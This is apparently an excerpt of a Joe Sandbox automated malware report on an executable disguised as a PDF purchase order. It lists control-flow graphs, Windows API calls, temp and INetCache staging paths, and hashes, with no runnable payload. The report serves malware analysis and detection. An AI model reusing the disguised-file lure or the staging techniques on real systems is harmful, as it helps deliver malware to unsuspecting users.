                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 3449924974-3081826266
                                                                                                            • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                            • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                            • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                            • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1033 10001759-10001795 call 10001b18 1037 100018a6-100018a8 1033->1037 1038 1000179b-1000179f 1033->1038 1039 100017a1-100017a7 call 10002286 1038->1039 1040 100017a8-100017b5 call 100022d0 1038->1040 1039->1040 1045 100017e5-100017ec 1040->1045 1046 100017b7-100017bc 1040->1046 1047 1000180c-10001810 1045->1047 1048 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 1045->1048 1049 100017d7-100017da 1046->1049 1050 100017be-100017bf 1046->1050 1054 10001812-1000184c call 100015b4 call 100024a9 1047->1054 1055 1000184e-10001854 call 100024a9 1047->1055 1071 10001855-10001859 1048->1071 1049->1045 1056 100017dc-100017dd call 10002b5f 1049->1056 1052 100017c1-100017c2 1050->1052 1053 100017c7-100017c8 call 100028a4 1050->1053 1059 100017c4-100017c5 1052->1059 1060 100017cf-100017d5 call 10002645 1052->1060 1066 100017cd 1053->1066 1054->1071 1055->1071 1069 100017e2 1056->1069 1059->1045 1059->1053 1070 100017e4 1060->1070 1066->1069 1069->1070 1070->1045 1075 10001896-1000189d 1071->1075 1076 1000185b-10001869 call 1000246c 1071->1076 1075->1037 1081 1000189f-100018a0 GlobalFree 1075->1081 1083 10001881-10001888 1076->1083 1084 1000186b-1000186e 1076->1084 1081->1037 1083->1075 1086 1000188a-10001895 call 1000153d 1083->1086 1084->1083 1085 10001870-10001878 1084->1085 1085->1083 1087 1000187a-1000187b FreeLibrary 1085->1087 1086->1075 1087->1083
                                                                                                            APIs
                                                                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                              • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                              • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                              • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2020005310.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2019990214.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2020057688.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2020073545.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 1791698881-3916222277
                                                                                                            • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                            • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                            • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                            • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1090 405c59-405c65 1091 405c66-405c9a GetTickCount GetTempFileNameW 1090->1091 1092 405ca9-405cab 1091->1092 1093 405c9c-405c9e 1091->1093 1095 405ca3-405ca6 1092->1095 1093->1091 1094 405ca0 1093->1094 1094->1095
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                            • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                            • API String ID: 1716503409-678247507
                                                                                                            • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                            • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                            • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                            • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1096 4063bf-4063df GetSystemDirectoryW 1097 4063e1 1096->1097 1098 4063e3-4063e5 1096->1098 1097->1098 1099 4063f6-4063f8 1098->1099 1100 4063e7-4063f0 1098->1100 1102 4063f9-406428 wsprintfW LoadLibraryW 1099->1102 1100->1099 1101 4063f2-4063f4 1100->1101 1101->1102
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                            • wsprintfW.USER32 ref: 00406411
                                                                                                            • LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                            • String ID: %s%S.dll
                                                                                                            • API String ID: 2200240437-2744773210
                                                                                                            • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                            • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                            • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                            • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                            APIs
                                                                                                              • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 00405AC2
                                                                                                              • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                              • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                              • Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi,?,00000000,000000F0), ref: 00401645
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi, xrefs: 00401638
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                            • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi
                                                                                                            • API String ID: 1892508949-4067767340
                                                                                                            • Opcode ID: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                            • Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
                                                                                                            • Opcode Fuzzy Hash: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                            • Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                              • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                            • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                            • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                            • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                              • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                              • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                            • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 334405425-0
                                                                                                            • Opcode ID: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                            • Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
                                                                                                            • Opcode Fuzzy Hash: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                            • Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D
                                                                                                            APIs
                                                                                                              • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000477,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsiEA09.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Enum$CloseOpenValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 167947723-0
                                                                                                            • Opcode ID: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                            • Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
                                                                                                            • Opcode Fuzzy Hash: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                            • Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                            APIs
                                                                                                              • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000477,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsiEA09.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3677997916-0
                                                                                                            • Opcode ID: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                            • Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
                                                                                                            • Opcode Fuzzy Hash: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                            • Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59
                                                                                                            APIs
                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                            • Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
                                                                                                            • Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                            • Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                              • Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                              • Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
                                                                                                              • Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 2547128583-0
                                                                                                            • Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                            • Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
                                                                                                            • Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                            • Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$EnableShow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1136574915-0
                                                                                                            • Opcode ID: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                            • Instruction ID: 46dfe73b81ae29a5099323896a5bc3e3d9df575198e3285abdeb67f25c429c8d
                                                                                                            • Opcode Fuzzy Hash: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
